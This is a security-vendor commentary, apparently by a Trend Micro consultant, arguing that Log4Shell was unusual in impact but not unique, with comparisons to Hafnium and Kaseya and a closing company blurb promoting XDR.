The answer to the question of whether Log4j / Log4Shell was unique is no. Certainly, the impact of the Log4Shell vulnerability was unusual. But RCE vulnerabilities are not uncommon. This was also shown by the attack in spring 2021 by the group known as "Hafnium" on Microsoft Exchange.
Software modules, such as the currently affected library, which are used in many applications in parallel and thus offer a wide range of attack points, are also part of everyday IT life. Still – what is special about the Log4j / Log4Shell incident is that all these factors come together.
Other weaknesses in everyday IT
That, at least, happens rather seldom, and it will probably (hopefully) be some time before something similar happens again. However, the probability increases. This is mainly because more and more software is being developed. This should be available quickly, which is why developers are forced to implement building blocks like Log4j. If a security gap is then discovered within such a component, it is not just the developer who is affected (such as Microsoft with "Hafnium"), but all manufacturers who implement this component. And that can be the individual company, for example with a specially built customer portal, but also the provider of a widespread application. Because more and more modules are required, the probability of a software gap becoming known in one or the other inevitably increases.
High level of danger
For Log4j / Log4Shell has the British National Cyber Security Center (NCSC) prepared an interesting list of questions. This is aimed at company leaders and is intended to provide guidance on how boards can deal with the situation. The background is that such a security gap has the potential to be life-threatening. This is because this makes it easy for criminal actors to infiltrate systems. On the other hand, this also has something "good" because if the vulnerability is "so" easy to attack, many hobby criminals do the same to place coin miners and often draw attention to vulnerable systems without causing enormous damage. Professional cybercriminals, on the other hand, use the gap to infiltrate a network and spread from there until they reach their destination - without being noticed. This takes time - depending on the system and the size of the company, this can take weeks to months. It is therefore to be expected that there will be an increase in ransomware incidents again from January.
Is Log4j / Log4Shell just a special case?
Richard Werner, Business Consultant at Trend Micro (Image: Trend Micro).
The widespread distribution of software and the wide range of uses ensure that there is always a window or door open somewhere in every company for the thief. The only question that really arises is who discovers the vulnerability first and deals with it in their best interests. Log4Shell shows again, just like Hafnium, Kaseya and other cybersecurity incidents that happened in 2021, that a purely proactive approach trying to block damage is difficult to implement.
Today we have to assume that somewhere, someone will find a window through which he can get in. A company's ability to identify and successfully hunt down this "thief" determines the extent of the damage it causes. Organizationally, in an emergency, one speaks of "Tiger Teams" or, in general, of the "Security Operations Center (SOC)". Technologically, however, many of the associated activities can be extremely simplified if modern technology such as XDR is used.
More at TrendMicro.com
About Trend Micro As one of the world's leading providers of IT security, Trend Micro helps create a secure world for digital data exchange. With over 30 years of security expertise, global threat research, and constant innovation, Trend Micro offers protection for businesses, government agencies, and consumers. Thanks to our XGen™ security strategy, our solutions benefit from a cross-generational combination of defense techniques optimized for leading-edge environments. Networked threat information enables better and faster protection. Optimized for cloud workloads, endpoints, email, the IIoT and networks, our connected solutions provide centralized visibility across the entire enterprise for faster threat detection and response.